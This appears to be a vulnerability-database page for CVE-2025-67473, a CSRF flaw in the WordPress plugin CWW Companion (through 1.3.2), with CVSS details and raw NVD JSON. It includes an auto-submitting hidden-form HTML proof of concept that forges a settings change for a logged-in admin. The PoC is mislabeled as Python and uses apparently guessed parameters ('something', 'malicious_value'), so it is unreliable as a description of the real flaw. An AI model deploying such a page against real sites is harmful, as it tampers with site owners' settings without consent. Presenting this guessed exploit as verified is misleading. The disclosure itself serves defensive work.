Security Vulnerability Report
中文
CVE-2025-67473 CVSS 4.3 MEDIUM

CVE-2025-67473

Published: 2025-12-09 16:18:24
Last Modified: 2026-04-27 18:16:40

Description

Cross-Site Request Forgery (CSRF) vulnerability in codeworkweb CWW Companion cww-companion allows Cross Site Request Forgery.This issue affects CWW Companion: from n/a through <= 1.3.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CWW Companion <= 1.3.2(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-67473 --> <!-- This PoC demonstrates the CSRF vulnerability in CWW Companion <= 1.3.2 --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CWW Companion</title> </head> <body> <h1>CSRF PoC for CVE-2025-67473</h1> <p>CWW Companion Plugin <= 1.3.2 CSRF Vulnerability</p> <!-- Auto-submit form targeting the vulnerable endpoint --> <form id="csrfForm" action="[TARGET_WORDPRESS_URL]/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Common CWW Companion settings parameters --> <input type="hidden" name="action" value="cww_companion_save_settings"> <input type="hidden" name="cww_companion_settings[something]" value="malicious_value"> <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=cww-companion"> </form> <script> // Auto-submit after page load document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the form was submitted.</p> <p>Note: This PoC requires the victim to be logged in as WordPress admin.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67473", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:23.770", "lastModified": "2026-04-27T18:16:39.807", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in codeworkweb CWW Companion cww-companion allows Cross Site Request Forgery.This issue affects CWW Companion: from n/a through <= 1.3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/cww-companion/vulnerability/wordpress-cww-companion-plugin-1-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}